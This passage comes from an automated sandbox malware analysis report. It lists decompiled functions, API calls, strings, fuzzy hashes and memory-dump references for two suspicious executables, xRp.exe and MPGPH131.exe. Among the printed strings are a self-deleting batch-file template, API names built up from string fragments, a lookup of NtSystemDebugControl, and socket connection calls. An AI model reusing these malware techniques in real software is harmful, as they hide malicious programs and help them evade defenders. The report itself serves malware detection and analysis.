Part of subcall function 004E185B: srand.MSVCRT ref: 004E1890
Part of subcall function 004E185B: rand.MSVCRT ref: 004E1894

wsprintfA.USER32 ref: 004E15AA
wsprintfA.USER32 ref: 004E15C6
lstrlen.KERNEL32(?), ref: 004E15D2
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 004E1609
CloseHandle.KERNEL32(00000000), ref: 004E1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004E162D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004E1599
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 004E15C0
%s%.8x.bat, xrefs: 004E15A4
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E158A, 004E15B3, 004E15B8, 004E15B9
open, xrefs: 004E1627

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: FileTimerandsrandwsprintf$CloseExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$open
API String ID: 1867526581-3117919743
Opcode ID: 3dcec1cff3763e342a0a9ad94320025a974d0d81ce8713a5bcc8c2a78cdc5409
Instruction ID: 10e66bc9d6bdd68753a019dacdef101b680414fcde42cbb97635a86c99c91d23
Opcode Fuzzy Hash: 3dcec1cff3763e342a0a9ad94320025a974d0d81ce8713a5bcc8c2a78cdc5409
Instruction Fuzzy Hash: B811A7729411687BD7219BA59C8DEEB7B6CDF49712F0000A2F549E3051DA749F848BB4

Function 004E2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,004E29DB,?,00000001), ref: 004E26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,004E29DB,?,00000001), ref: 004E26B5
lstrlen.KERNEL32(?), ref: 004E26C4
??2@YAPAXI@Z.MSVCRT ref: 004E26CE
lstrcpy.KERNEL32(00000004,?), ref: 004E26E3
lstrcpy.KERNEL32(?,00000004), ref: 004E271F
??3@YAXPAX@Z.MSVCRT ref: 004E272D
SetEvent.KERNEL32 ref: 004E273C

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 39454bfb4c35a1b99dff934470621d5c46b7feaa01bdd2cb9f0f4ef2c43268ca
Instruction ID: 06ee0f8d6bac8b9e4cb81f9602c82178c5fc4161509f4bf1cf8177b37acc1f96
Opcode Fuzzy Hash: 39454bfb4c35a1b99dff934470621d5c46b7feaa01bdd2cb9f0f4ef2c43268ca
Instruction Fuzzy Hash: 85118135500290EFCB229F5AEE88C6B7BADFBC47227104136F4548B221D7B48D85DB58

Function 004E1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 004E1BCD
rand.MSVCRT ref: 004E1BD8
memset.MSVCRT ref: 004E1C43
memcpy.MSVCRT ref: 004E1C4F
lstrcat.KERNEL32(?,.exe), ref: 004E1C5D

Strings

.exe, xrefs: 004E1C57
GDCKnTsbkBudQEhjqmjhJlOvyrOTnXZIUgpCNuVmsDpybvloXqHpKXUwOFMaSZYxtsMuzzJLkfFVHLLdrNUNtPAPxTcGxmISQFkaAgBlMfhHSWJRoRyiInBZdreQVetYwRzCqEoKabeWfYjwccGAiWiDgPEv, xrefs: 004E1B8A, 004E1B9C, 004E1C15, 004E1C49

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$GDCKnTsbkBudQEhjqmjhJlOvyrOTnXZIUgpCNuVmsDpybvloXqHpKXUwOFMaSZYxtsMuzzJLkfFVHLLdrNUNtPAPxTcGxmISQFkaAgBlMfhHSWJRoRyiInBZdreQVetYwRzCqEoKabeWfYjwccGAiWiDgPEv
API String ID: 122620767-486614533
Opcode ID: 58b9f10d35c9c562c5c9a1f4fedb66789c47ef5f2d5d5c605c3de3485fda766a
Instruction ID: 9a591f7dee6a68bd1cca14824240c7137551db768e8a955483a04017e4c3e651
Opcode Fuzzy Hash: 58b9f10d35c9c562c5c9a1f4fedb66789c47ef5f2d5d5c605c3de3485fda766a
Instruction Fuzzy Hash: 9A214932E841D06ED2261337AC80F6A2B449FE3723F2540ABF5D54F2E3D17C0991926D

Function 004E189D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51synchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004E18B1
CloseHandle.KERNEL32(I%N), ref: 004E18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004E18F0
GetExitCodeProcess.KERNEL32(?,?), ref: 004E1901
CloseHandle.KERNEL32(?), ref: 004E190A

Strings

I%N, xrefs: 004E18E0

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: CloseHandle$CodeExitObjectProcessSingleWaitmemset
String ID: I%N
API String ID: 2982373586-4187869997
Opcode ID: 4f6aa2925a2f6d21a0b23ecde24b5c8bb5a81cad26e0aac2b2d44d0ada7717ca
Instruction ID: e070ff105b46812342e9ac568c299141268423e2314213a2074a78f3512f1779
Opcode Fuzzy Hash: 4f6aa2925a2f6d21a0b23ecde24b5c8bb5a81cad26e0aac2b2d44d0ada7717ca
Instruction Fuzzy Hash: 6201B172900168BBCB21AF92DC4CDEF7F3DEF85331F104022F915A61A5C2754A18CAA4

Function 004E1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 004E1334
6CC16DE0.KERNEL32(00000000), ref: 004E133B
memset.MSVCRT ref: 004E1359

Strings

NtSystemDebugControl, xrefs: 004E132A
ntdll.dll, xrefs: 004E132F

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: HandleModulememset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 1044559590-2438149413
Opcode ID: 43e19689bde84019883349af687d88e33d6a093441340bdbc435665de83ed6c2
Instruction ID: db53836fe249b4aae4fd8ffd55fafb9078964cf5a9d1d44d7996d3ee3732d158
Opcode Fuzzy Hash: 43e19689bde84019883349af687d88e33d6a093441340bdbc435665de83ed6c2
Instruction Fuzzy Hash: AB01A171640389EFEB11DFA6ECC8A6FBB68FB41306F00057BF901A6551D2748605CA59

Function 004E1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 004E1E0B
lstrcpy.KERNEL32(?,00000001), ref: 004E1E1C
strrchr.MSVCRT ref: 004E1E2B
lstrcmpiA.KERNEL32(?,004E4488), ref: 004E1E48
lstrlen.KERNEL32(004E4488), ref: 004E1E53

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: f15421baf578484a6de39fc6a0453359a50713b2fda7268a1977d24458829afd
Instruction ID: 253d107374bdef1af40673ce684b093ba953044a2275cf81d7f372c14e94d1c9
Opcode Fuzzy Hash: f15421baf578484a6de39fc6a0453359a50713b2fda7268a1977d24458829afd
Instruction Fuzzy Hash: 1201DB729042956FDB115B64DC48BD777DCDB04312F040477F945D7091D6789E848B98

Function 004E185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(004E1F92,00000000,?,00000000,?,?,?,004E1F92,?,00000000,00000002), ref: 004E1867
srand.MSVCRT ref: 004E1878
rand.MSVCRT ref: 004E1880
srand.MSVCRT ref: 004E1890
rand.MSVCRT ref: 004E1894

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: d604940b90ab14632071e5e6f78235091b97c67fc2e4ff8e52dd1c367726a13c
Instruction ID: 7844f533dcc1dcafc11a8cf9c38af7dc3cc6de340ac8277b50dc9087b3f664e9
Opcode Fuzzy Hash: d604940b90ab14632071e5e6f78235091b97c67fc2e4ff8e52dd1c367726a13c
Instruction Fuzzy Hash: B6E0D877A00218BBD700ABF9EC8A89EBBACDF84162B100537F600D3255E570FD448BB8

Function 004E6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004E603C
6CC16DE0.KERNEL32(00000000,004E6064), ref: 004E604F

Strings

kernel32.dll, xrefs: 004E603B

Memory Dump Source

Source File: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: HandleModule
String ID: kernel32.dll
API String ID: 4139908857-1793498882
Opcode ID: 3921539fa191f55cf1e8754c8e12e2030db961ee0a7cdae8a9294f184cb273b5
Instruction ID: 6b98c7ac211e0c3ecb2654d8ef692e2fd5354cb25a1ce9647a1134942f7cbf53
Opcode Fuzzy Hash: 3921539fa191f55cf1e8754c8e12e2030db961ee0a7cdae8a9294f184cb273b5
Instruction Fuzzy Hash: 03F0C2B11402998BDF70CE65CC44BDE37E4EB15751F50042BE909CB282CB3886058B19

Analysis Process: MPGPH131.exePID: 7416, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	3.3%
Signature Coverage:	0%
Total number of Nodes:	209
Total number of Limit Nodes:	34

Executed Functions

Function 01050044 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 01050223

Strings

.dll, xrefs: 01050102
Crea, xrefs: 01050169
Clos, xrefs: 01050129
Writ, xrefs: 01050148
GetT, xrefs: 01050188
dleA, xrefs: 010500D0
WinE, xrefs: 01050110
lstr, xrefs: 010501A7
Kern, xrefs: 010500F4
athA, xrefs: 01050199
odul, xrefs: 0105022D
xRp.exe, xrefs: 010501FD, 01050200
catA, xrefs: 010501AF
GetM, xrefs: 010500B6
el32, xrefs: 010500FB

Memory Dump Source

Source File: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
API String ID: 823142352-2378254480
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: 53613071c213fd2b033819c0513f2790d4aa171d1789a8e0a9f3f1142b7a72cc
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 91616174D01215DFCFA5CF98C984AAEFBB4BF44315F14C1AAE98567205C3709A81CF9A

Function 00ACD620 Relevance: 6.1, APIs: 4, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00ACD64B
socket.WS2_32(?,?,?,?,?,?,00BE50C8,?,?), ref: 00ACD6EE
connect.WS2_32(00000000,?,?,?,?,?,00BE50C8,?,?), ref: 00ACD702
closesocket.WS2_32(00000000), ref: 00ACD70D

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID:
API String ID: 3098855095-0
Opcode ID: 7d20025cf2e4111f9fab4008a36981b6073b83904d20b390c9e9f9170209f577
Instruction ID: 619fde5c42efbe93dd1003e5db0a5d5b0b3b143f9d8699db443a655cb8fcaee4
Opcode Fuzzy Hash: 7d20025cf2e4111f9fab4008a36981b6073b83904d20b390c9e9f9170209f577
Instruction Fuzzy Hash: 8731C4725053509BD7209F248844B6FB7E5FFC5374F111F2EF8A8A3290D771990486A2

Function 05610631 Relevance: 1.9, APIs: 1, Instructions: 354
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 2b79dae96fa96d9e7dfb2f28b60ab1c17184c0a748c54f1f3a717ab1fd473be3
Instruction ID: 5f96b2395f414d5363e8df147e4e55781410de55641f110b767cb0f524fccdfb
Opcode Fuzzy Hash: 2b79dae96fa96d9e7dfb2f28b60ab1c17184c0a748c54f1f3a717ab1fd473be3
Instruction Fuzzy Hash: 6761B0EB14D120BEB942C1852B6CEF7676FE6CA730738C427FC07D6502E6944ACA9179

Function 0561084C Relevance: 1.7, APIs: 1, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: a6cbfb5825c26bce854597b95ee16b9ab701cecfb9366ee6db54bf52adb61cf0
Instruction ID: bdf93ccc00d293f7c8f25b90f76689e9332f51aa485e50ac36bebe61b289e372
Opcode Fuzzy Hash: a6cbfb5825c26bce854597b95ee16b9ab701cecfb9366ee6db54bf52adb61cf0
Instruction Fuzzy Hash: C441D4FB14D124BFB952C0852B28AF6676FE6C67307388477FC07D6202EA840ECA9175

Function 0561085E Relevance: 1.7, APIs: 1, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF

Memory Dump Source

Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 249f9e83bfb85ed756cefc64403f252f28fe1733019edb9578bc4eab05f8a3b9
Instruction ID: 6dcf18ae2beaab9012122f3ee267844d563c2eb0691da9125df5a93a676e6b01
Opcode Fuzzy Hash: 249f9e83bfb85ed756cefc64403f252f28fe1733019edb9578bc4eab05f8a3b9
Instruction Fuzzy Hash: 1041C3FB14D124BEB952C0852B28AF6676FE6CA7307348477FC07D6206EAC44ECA9175

Function 0561086D Relevance: 1.7, APIs: 1, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF

Memory Dump Source

Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 7d16a383a7fe66598eac22a170cf3928baa2b5d397659e4d49b2d3dcb5ff74b8
Instruction ID: 26df1941e1f1bdbf7dde1aeda4467201917e0e177a9662d46340f4afc1208798
Opcode Fuzzy Hash: 7d16a383a7fe66598eac22a170cf3928baa2b5d397659e4d49b2d3dcb5ff74b8
Instruction Fuzzy Hash: A541C2FB14D124BEB952C0852B28AF6666FE6C67307348477FC07D6602EAC40ECA9175

Function 0561087D Relevance: 1.7, APIs: 1, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF

Memory Dump Source

Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 2a4a325a39777ef91778c6239578b51763843ec84b45adbfde7b58f5ac1fa289
Instruction ID: cb98580c6ae313a1903ffaad0d33aa774b072e4b77e4e392fdd201baf702a673
Opcode Fuzzy Hash: 2a4a325a39777ef91778c6239578b51763843ec84b45adbfde7b58f5ac1fa289
Instruction Fuzzy Hash: 9541B1FB14D124BEB952C0852B28AFA666FE6CA7303348477FC07D6606E6C44ECA9175

Function 056108B6 Relevance: 1.7, APIs: 1, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF

Memory Dump Source

Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: b790e3f518671f2eb06766b4f0c6a2e52161afee2a9f25e5398e99716017b9f7
Instruction ID: e247fdaf4ce6569f531136449fc0c9469e1e8918cae5a552fa5bd37edc1ac6bf
Opcode Fuzzy Hash: b790e3f518671f2eb06766b4f0c6a2e52161afee2a9f25e5398e99716017b9f7
Instruction Fuzzy Hash: DC41D3FB14D124BEB902C0852B68AFA676FE6CA7307348477FC07D6106E6950ECA9275

Function 00BA21BC Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,00B95DA7,?,00000000,00000000,00000000,?,00000000,?,00B8B2D2,00B95DA7,00000000,00B8B2D2,?,?), ref: 00BA2341

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 718316b4db576a46760030e8d97d68f1dd76f5109f9eff5c9d2d0cccfbbc2b9c
Instruction ID: b8f29d641bc96862294e53bdf279ba65bda011e3931db04cbc006bc6aecbb7dd
Opcode Fuzzy Hash: 718316b4db576a46760030e8d97d68f1dd76f5109f9eff5c9d2d0cccfbbc2b9c
Instruction Fuzzy Hash: 9D61A171D08259AEDF15CFACC884AEEBBF9EF0B304F1405D5E900AB256D375D9018BA4

Function 056108F7 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF

Memory Dump Source

Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 449590e5436389bf938ae38991c3122859a399f9eddc0128713b545ffd64ceab
Instruction ID: ece726391ebbb00b085851e275961cc99a22887a6859daaac862ebf5b31ee4a2
Opcode Fuzzy Hash: 449590e5436389bf938ae38991c3122859a399f9eddc0128713b545ffd64ceab
Instruction Fuzzy Hash: 4E31C2FB14D124BEB912C0452B68AFA666FE6CA730734C477FC07D2106E7844ECA9279

Function 00B1ACB0 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00B1AE01

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
